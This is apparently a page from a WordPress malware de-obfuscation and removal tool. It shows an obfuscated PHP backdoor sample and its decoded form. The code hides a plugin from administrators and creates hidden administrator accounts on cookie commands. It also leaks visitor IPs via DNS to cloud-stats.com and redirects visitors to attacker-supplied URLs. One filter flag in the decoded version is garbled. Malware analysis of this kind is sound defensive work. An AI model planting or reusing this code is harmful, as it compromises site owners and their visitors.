De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $p0=base64_decode('NTA0NTIyMDg4OGU4YzA2NjU4Y2JmYzIxMmMxOWEzOWM=');if(current_user_can(base64_decode('YWRtaW5pc3RyYXRvcg=='))&&!array_key_exists(base64_decode('c2hvd19hbGw='),$_GET)){add_action(base64_decode('YWRtaW5fcHJpbnRfc2NyaXB0cw=='),function(){echo base64_decode('PHN0eWxlPg==');echo base64_decode('I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9');echo base64_decode('I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('PC9zdHlsZT4=');});add_filter(base64_decode('YWxsX3BsdWdpbnM='),function($q1){unset($q1[base64_decode('aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=')]);return $q1;});}if(!function_exists(base64_decode('X3JlZA=='))){error_reporting(0);ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);function _gcookie($p2){return(isset($_COOKIE[$p2]))?base64_decode($_COOKIE[$p2]):'';}if(!empty($p0)&&_gcookie(base64_decode('cHc='))===$p0){switch(_gcookie(base64_decode('Yw=='))){case base64_decode('c2Q='):$d3=_gcookie(base64_decode('ZA=='));if(strpos($d3,base64_decode('Lg=='))>0){update_option(base64_decode('ZA=='),$d3);}break;case base64_decode('YXU='):$u4=_gcookie(base64_decode('dQ=='));$g5=_gcookie(base64_decode('cA=='));$n6=_gcookie(base64_decode('ZQ=='));if($u4&&$g5&&$n6&&!username_exists($u4)){$m7=wp_create_user($u4,$g5,$n6);$d8=new WP_User($m7);$d8->set_role(base64_decode('YWRtaW5pc3RyYXRvcg=='));}break;}return;}if(stripos(wp_login_url(),$_SERVER[base64_decode('U0NSSVBUX05BTUU=')])!==false){return;}if(_gcookie(base64_decode('c2tpcA=='))===base64_decode('MQ==')){return;}function _is_mobile(){return preg_match(base64_decode('LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p'),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _is_iphone(){return preg_match(base64_decode('LyhpcGhvbmV8aXBvZCkvaQ=='),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _user_ip(){foreach(array(base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ'),base64_decode('SFRUUF9DTElFTlRfSVA='),base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I='),base64_decode('SFRUUF9YX0ZPUldBUkRFRA=='),base64_decode('SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ'),base64_decode('SFRUUF9GT1JXQVJERURfRk9S'),base64_decode('SFRUUF9GT1JXQVJERUQ='),base64_decode('UkVNT1RFX0FERFI='))as $v9){if(array_key_exists($v9,$_SERVER)&&!empty($_SERVER[$v9])){foreach(explode(base64_decode('LA=='),$_SERVER[$v9])as $t10){$t10=trim($t10);if(filter_var($t10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $t10;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$t10=_user_ip();if(!$t10){return;}$r11=get_transient(base64_decode('ZXhw'));if(!is_array($r11)){$r11=array();}foreach($r11 as $r12=>$o13){if(time()-$o13>86400){unset($r11[$r12]);}}if(key_exists($t10,$r11)&&(time()-$r11[$t10]<86400)){return;}$j14=filter_var(parse_url(base64_decode('aHR0cHM6Ly8=').$_SERVER[base64_decode('SFRUUF9IT1NU')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$v15=str_replace(base64_decode('Og=='),base64_decode('LQ=='),$t10);$v15=str_replace(base64_decode('Lg=='),base64_decode('LQ=='),$v15);$r16=base64_decode('Y2xvdWQtc3RhdHMuY29t');$m17=get_option(base64_decode('ZA=='));if($m17&&strpos($m17,base64_decode('Lg=='))>0){$r16=$m17;}$u18=_is_iphone()?base64_decode('aQ=='):base64_decode('bQ==');$t19=(!$j14?base64_decode('dW5rLmNvbQ=='):$j14).base64_decode('Lg==').(!$v15?base64_decode('MC0wLTAtMA=='):$v15).base64_decode('Lg==').mt_rand(100000,999999).base64_decode('Lg==').(_is_mobile()?base64_decode('bg==').$u18:base64_decode('bmQ=')).base64_decode('Lg==').$r16;$n20=@dns_get_record($t19,DNS_TXT);if(is_array($n20)&&!empty($n20)){if(isset($n20[0][base64_decode('dHh0')])){$n20=$n20[0][base64_decode('dHh0')];$n20=base64_decode($n20);if($n20==base64_decode('ZXJy')){$r11[$t10]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$r11);}else if(substr($n20,0,4)===base64_decode('aHR0cA==')){$r11[$t10]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$r11);wp_redirect($n20);exit;}}}}add_action(base64_decode('aW5pdA=='),base64_decode('X3JlZA=='));}
<?php $p0 = "5045220888e8c06658cbfc212c19a39c"; if (current_user_can("administrator") && !array_key_exists("show_all", $_GET)) { add_action("admin_print_scripts", function () { echo "<style>"; echo "#toplevel_page_wpcode { display: none; }"; echo "#wp-admin-bar-wpcode-admin-bar-info { display: none; }"; echo "#wpcode-notice-global-review_request { display: none; }"; echo "</style>"; }); add_filter("all_plugins", function ($q1) { unset($q1["insert-headers-and-footers/ihaf.php"]); return $q1; }); } if (!function_exists("_red")) { error_reporting(0); ini_set("display_errors", 0); function _gcookie($p2) { return isset($_COOKIE[$p2]) ? base64_decode($_COOKIE[$p2]) : ''; } if (!empty($p0) && _gcookie("pw") === $p0) { switch (_gcookie("c")) { case "sd": $d3 = _gcookie("d"); if (strpos($d3, ".") > 0) { update_option("d", $d3); } break; case "au": $u4 = _gcookie("u"); $g5 = _gcookie("p"); $n6 = _gcookie("e"); if ($u4 && $g5 && $n6 && !username_exists($u4)) { $m7 = wp_create_user($u4, $g5, $n6); $d8 = new WP_User($m7); $d8->set_role("administrator"); } break; } return; } if (stripos(wp_login_url(), $_SERVER["SCRIPT_NAME"]) !== false) { return; } if (_gcookie("skip") === "1") { return; } function _is_mobile() { return preg_match("/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up.browser|up.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]); } function _is_iphone() { return preg_match("/(iphone|ipod)/i", $_SERVER["HTTP_USER_AGENT"]); } function _user_ip() { foreach (array("HTTP_CF_CONNECTING_IP", "HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_X_CLUSTER_CLIENT_IP", "HTTP_FORWARDED_FOR", "HTTP_FORWARDED", "REMOTE_ADDR") as $v9) { if (array_key_exists($v9, $_SERVER) && !empty($_SERVER[$v9])) { foreach (explode(",", $_SERVER[$v9]) as $t10) { $t10 = trim($t10); if (filter_var($t10, FILTER_VALIDATE_IP, "FILTER_FLAG_NO_RW[__SOOGE") !== false) { return $t10; } } } } return false; } function _red() { if (is_user_logged_in()) { return; } $t10 = _user_ip(); if (!$t10) { return; } $r11 = get_transient("exp"); if (!is_array($r11)) { $r11 = array(); } foreach ($r11 as $r12 => $o13) { if (time() - $o13 > 86400) { unset($r11[$r12]); } } if (key_exists($t10, $r11) && time() - $r11[$t10] < 86400) { return; } $j14 = filter_var(parse_url("https://" . $_SERVER["HTTP_HOST"], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME); $v15 = str_replace(":", "-", $t10); $v15 = str_replace(".", "-", $v15); $r16 = "cloud-stats.com"; $m17 = get_option("d"); if ($m17 && strpos($m17, ".") > 0) { $r16 = $m17; } $u18 = _is_iphone() ? "i" : "m"; $t19 = (!$j14 ? "unk.com" : $j14) . "." . (!$v15 ? "0-0-0-0" : $v15) . "." . mt_rand(100000, 999999) . "." . (_is_mobile() ? "n" . $u18 : "nd") . "." . $r16; $n20 = @dns_get_record($t19, DNS_TXT); if (is_array($n20) && !empty($n20)) { if (isset($n20[0]["txt"])) { $n20 = $n20[0]["txt"]; $n20 = base64_decode($n20); if ($n20 == "err") { $r11[$t10] = time(); delete_transient("exp"); set_transient("exp", $r11); } else { if (substr($n20, 0, 4) === "http") { $r11[$t10] = time(); delete_transient("exp"); set_transient("exp", $r11); wp_redirect($n20); exit; } } } } } add_action("init", "_red"); }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.